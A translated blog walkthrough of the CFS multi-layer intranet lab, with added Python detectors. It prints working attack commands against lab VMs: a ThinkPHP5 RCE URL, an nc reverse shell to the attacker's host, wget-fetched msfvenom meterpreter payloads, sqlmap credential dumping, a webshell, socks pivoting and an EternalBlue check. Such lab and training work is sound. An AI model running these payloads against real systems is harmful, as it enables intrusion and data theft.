CFS Target Machines: a Multi-Layer Intranet Penetration Lab

CFS lab setup guide: https://www.anquanke.com/post/id/187908#h2-10

Lab setup

Setting up the lab is the part that gives me the biggest headache, so here are the key configuration points.

In VMware, the most important piece is the Virtual Network Editor.

The most painful part of it is the bridged network setup. Why painful? Because I had never once gotten bridged networking to work before. This time, though, I finally figured it out. The crucial point with bridged networking is to pick a real network adapter that can actually reach the Internet (if you don't choose one yourself, VMware picks one automatically, and that very often leaves the VM without connectivity).

So how do you find out which adapter is in use? The screenshot below shows it:

As the screenshot shows, my host goes online through WLAN, so in bridged mode we simply select the adapter marked in the red box.

Here is a link on fixing VMware bridged mode when it refuses to work:

If bridged mode still won't work even though you followed the steps exactly, reboot the computer. After a reboot it usually works.

You also need to configure two host-only adapters, which is straightforward: assign the IP addresses manually and disable DHCP.

To reduce mistakes, I suggest restoring VMware's network settings to defaults and configuring from a clean initial state. One more thing to watch is the IP assignment for target2: after logging in to the machine, first run ifconfig to see its interfaces, then assign the IP, for example ifconfig ens33 192.168.22.22 netmask 255.255.255.0

I forgot to mention target1: sometimes the IP it gets differs from the one in the CFS article, but that does not affect us. We only need to re-point the site's domain resolution in the Baota (宝塔) panel.

Host scanning

target1

Scan it with Nmap

root@kali:~# nmap -sS -A 192.168.101.91 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-12 11:20 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.101.91
Host is up (0.00045s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:openbsd:openssh:7.4: 
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|_    	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
80/tcp   open  http    nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp  open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
888/tcp  open  http    nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open  mysql   MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8888/tcp open  http    Ajenti http control panel
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:1F:D6:B9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.101.91

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 564.90 seconds

We learn that the target has ports 21, 22, 80, 111 and 3306, among others, open.

Port 22 shows a username enumeration vulnerability, which could be used for brute forcing.

But, as usual, let's look at port 80 first.

ThinkPHP5 is a welcome sight: it has plenty of vulnerabilities. No rush, though; first let's look at the robots.txt that nmap found.

Found a flag:

ThinkPHP5 remote command execution

Exploit it directly:

http://192.168.101.91/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

Executed successfully.

Reverse shell

Since we can execute commands, let's get a reverse shell.

First, on Kali, run nc -lvp 7777

Then, through the remote command execution vulnerability, run nc 192.168.101.90 7777 -e /bin/bash

After the command runs we have a shell, and python -c 'import pty;pty.spawn("/bin/bash")' gives us an interactive one.

A flag was found in the site's web root.

Another flag was found under /home on the server.

With that, all the flags on target1 have been found. Next, on to the next target.

target2

Testing showed the target machine has wget, which makes things easy: generate an ELF payload with msf.

Generating the ELF

Check the kernel with uname -a

[www@localhost public]$ uname -a
uname -a
Linux localhost.localdomain 3.10.0-1062.1.1.el7.x86_64 #1 SMP Fri Sep 13 22:55:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

So the payload we generate must be x86 as well.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=8888 -f elf >shell.elf

Bringing target1 into msf

Start a web server with Python 2: python -m SimpleHTTPServer 8080

On the target, download the ELF with wget http://192.168.101.90:8080/shell.elf.

Then run chmod +x shell.elf to make it executable.

Next, set up the listener in Kali:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.101.90
lhost => 192.168.101.90
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.101.90   yes       The listen address (an interface may be specified)
   LPORT  8888             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Start the listener and run the ELF on the target:

Session established.

Routing

In msf, run: run get_local_subnets to list the current subnets.

192.168.101.0 is the subnet we just exploited; now we need to reach a machine on another subnet, so a route has to be added.

Add the route with run autoroute -s 192.168.22.0/24.

Print the routing table with run autoroute -p.

Discovering target2

I originally wanted to use the arp_scanner post module for ARP discovery, but the Linux ELF payload does not support that script.

So we switch to another method.

Use the portscan module:

msf5 auxiliary(scanner/portscan/tcp) > set ports 22,3389
ports => 22,3389
msf5 auxiliary(scanner/portscan/tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        22,3389          yes       Ports to scan (e.g. 22-25,80,110-900)
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.22.0/24  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      100              yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

For simplicity I only scanned ports 22 and 3389.

From the scan results, 192.168.22.22 is a Linux machine, which is the target2 we are looking for.

Since this machine sits in the internal network, there are two ways to reach it:

1. Port forwarding (inefficient).

2. Using a proxy.

For a smoother penetration test I use a socks4a proxy.

msf5 auxiliary(scanner/portscan/tcp) > search socks4a

Matching Modules
================

   #  Name                      Disclosure Date  Rank    Check  Description
   -  ----                      ---------------  ----    -----  -----------
   0  auxiliary/server/socks4a                   normal  No     Socks4a Proxy Server


msf5 auxiliary(scanner/portscan/tcp) > use 0
msf5 auxiliary(server/socks4a) > show options 

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  


msf5 auxiliary(server/socks4a) > set srvport 9999
srvport => 9999
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.

[*] Starting the socks4a proxy server

The socks4a proxy listens on a local port by default, so through it we can reach every subnet msf has a route for.

Configuring proxychains

On Kali, edit the configuration with vim /etc/proxychains.conf

Now we can scan the target through the proxy.

proxychains nmap -Pn -sT 192.168.22.22 scans the target.

Why '-Pn -sT': a socks4a proxy only relays TCP connections and cannot carry ICMP, so -Pn skips the host-discovery ping and -sT performs a full TCP connect scan.

Scan results:

Next, access port 80 on that IP through the proxy to look at the web service.

It is BageCMS (八哥cms); out of habit I checked robots.txt.

Using the information in robots.txt, I found the admin backend address.

The way in is in the homepage source, which hints at an injection.

Bring out sqlmap:

python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword --dbs

python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables

python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns

python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
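From the defender's side, both the ThinkPHP5 invokefunction request used against target1 earlier and the sqlmap probes against the keyword parameter here leave distinctive traces in the web server's access log. The following Python is an added example, not code from the original post: it flags both patterns in constructed nginx log lines (the sample lines, their client IPs and timestamps are made up for the demo).

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed nginx access-log lines (combined format) for the demo; not from the post.
SAMPLE_LOG = """\
192.168.101.90 - - [12/Feb/2020:11:30:01 +0800] "GET /index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.101.90 - - [12/Feb/2020:11:31:07 +0800] "GET /index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=id HTTP/1.1" 200 128 "-" "curl/7.68.0"
192.168.101.90 - - [12/Feb/2020:11:32:15 +0800] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Feb/2020:12:01:40 +0800] "GET /index.php?r=vul&keyword=1%27%20AND%201%3D1--%20- HTTP/1.1" 200 2048 "-" "sqlmap/1.4"
10.0.0.5 - - [12/Feb/2020:12:01:41 +0800] "GET /index.php?r=vul&keyword=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# ThinkPHP 5 invokefunction RCE: the 's=' route smuggles a think\app class path and
# function=call_user_func_array dispatches an arbitrary PHP callable (the post's payload).
THINKPHP_RCE = re.compile(r'invokefunction|call_user_func_array|think\\app', re.IGNORECASE)

# Boolean/union/time-based SQL injection probes, as sqlmap sends them, in any parameter value.
SQLI_PROBE = re.compile(
    r"""['"]\s*(?:and|or)\s+\d+\s*=\s*\d+|union\s+(?:all\s+)?select|sleep\s*\(|benchmark\s*\(""",
    re.IGNORECASE,
)


def classify_request(target):
    """Return detection labels for one request target ('path?query')."""
    _path, _sep, query = target.partition("?")
    labels = []
    if THINKPHP_RCE.search(unquote_plus(query)):
        labels.append("thinkphp5_invokefunction")
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if any(SQLI_PROBE.search(v) for v in values):
            labels.append(f"sqli_probe:{name}")
    return labels


def scan_log(text):
    """Return (client ip, timestamp, labels, target) for every log line that triggers a detection."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        labels = classify_request(m["target"])
        if labels:
            hits.append((m["ip"], m["ts"], labels, m["target"]))
    return hits
```

Because the query string is percent-decoded before matching, the encoded variant of the invokefunction request (second sample line) is caught as well as the raw one.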

Logging into the backend

Log in to the backend with the recovered password and find a flag.

Find the template editor and add a one-line webshell.

Then configure Proxifier

Connect with China Chopper (菜刀) to http://192.168.22.22/index.php?r=tag with the password pass.

Getting a shell

A flag was found under the site's /upload directory

Bringing it into msf

Check the Linux version with uname -a

This time we use bind_tcp.

bind_tcp: the attacker specifies a port (LPORT); when the payload runs on the target it opens that port, so the attacker can connect in.

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=1111 -f elf > shell1.elf
----------------------------------------------------------------------------
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 192.168.22.22
rhost => 192.168.22.22
msf5 exploit(multi/handler) > set lport 1111
lport => 1111

Once we run the generated shell1.elf on the target machine, the session comes in.

After that it's the same routine as before: discover the subnets and add the route.
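A bind_tcp payload necessarily opens a new listening socket on the compromised host, which is exactly what a defender can baseline and alert on. The following Python is an added example, not part of the original post: it diffs two constructed `ss -ltnp` snapshots (made up for the demo, with the post's LPORT 1111 as the new listener) and reports listeners that were not in the baseline.

```python
import re

# Constructed `ss -ltnp` snapshots for the demo (not captured from the lab machine).
# BASELINE is what a clean target2 should look like; CURRENT adds the listener that a
# linux/x64/meterpreter/bind_tcp payload opens on LPORT 1111, the port used in the post.
BASELINE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      511          0.0.0.0:80         0.0.0.0:*     users:(("nginx",pid=1203,fd=6))
LISTEN 0      80         127.0.0.1:3306       0.0.0.0:*     users:(("mysqld",pid=1330,fd=21))
"""
CURRENT = BASELINE + (
    'LISTEN 0      1            0.0.0.0:1111       0.0.0.0:*     '
    'users:(("shell1.elf",pid=4021,fd=3))\n'
)

SOCKET_LINE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s*(?P<proc>.*)$')
PROCESS = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')


def parse_listeners(text):
    """Map (local address, port) -> (process name, pid) for each LISTEN line of `ss -ltnp` output."""
    listeners = {}
    for line in text.splitlines():
        m = SOCKET_LINE.match(line)
        if not m:
            continue
        p = PROCESS.search(m["proc"])
        name, pid = (p["name"], int(p["pid"])) if p else ("?", 0)
        listeners[(m["addr"], int(m["port"]))] = (name, pid)
    return listeners


def new_listeners(baseline_text, current_text):
    """Return listeners present now but absent from the baseline, most exposed first.

    A bind-shell payload has to open such a socket, so a new, externally reachable
    port owned by a process that is not a known service is the signal to investigate.
    """
    base = parse_listeners(baseline_text)
    findings = []
    for (addr, port), (name, pid) in parse_listeners(current_text).items():
        if (addr, port) in base:
            continue
        exposed = addr in ("0.0.0.0", "*", "[::]", "::")
        findings.append({"addr": addr, "port": port, "process": name, "pid": pid, "exposed": exposed})
    findings.sort(key=lambda f: (not f["exposed"], f["port"]))
    return findings
```

On a real host the same function can be fed the stored baseline and the live output of `ss -ltnp`, so a bind-style listener shows up even when the hop that reaches it is only visible through the attacker's pivot.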

target3

msf5 exploit(multi/handler) > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  Yes    WordPress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  Yes    NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  Yes    TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  Yes    FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  Yes    TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  Yes    TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  Yes    TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner


msf5 exploit(multi/handler) > use 5

msf5 auxiliary(scanner/portscan/tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        22,3389          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.22.0/24  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      100              yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.33.0/24
rhosts => 192.168.33.0/24
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,445,3389
ports => 22,445,3389
msf5 auxiliary(scanner/portscan/tcp) > exploit 

[+] 192.168.33.33:        - 192.168.33.33:445 - TCP OPEN
[+] 192.168.33.33:        - 192.168.33.33:3389 - TCP OPEN
[+] 192.168.33.22:        - 192.168.33.22:22 - TCP OPEN
[*] 192.168.33.0/24:      - Scanned  49 of 256 hosts (19% complete)
[*] 192.168.33.0/24:      - Scanned  59 of 256 hosts (23% complete)
[*] 192.168.33.0/24:      - Scanned  99 of 256 hosts (38% complete)
[*] 192.168.33.0/24:      - Scanned 114 of 256 hosts (44% complete)
[*] 192.168.33.0/24:      - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.33.0/24:      - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.33.0/24:      - Scanned 201 of 256 hosts (78% complete)
[*] 192.168.33.0/24:      - Scanned 208 of 256 hosts (81% complete)
[*] 192.168.33.0/24:      - Scanned 255 of 256 hosts (99% complete)
[*] 192.168.33.0/24:      - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

We find the target 192.168.33.33 with ports 445 and 3389 open.

So let's go with EternalBlue.

EternalBlue

First, check whether the vulnerability is present

msf5 auxiliary(scanner/portscan/tcp) > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 auxiliary(scanner/portscan/tcp) > use 1
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.33.33:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.33.33:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The vulnerability is present, so exploit it!

In the end the network had a small problem that I didn't get around to fixing; from the published walkthrough, the exploit does succeed.

Originally published on HackerGu's Blog: CFS Target Machines, a Multi-Layer Intranet Penetration Lab. Reproduction without permission is prohibited.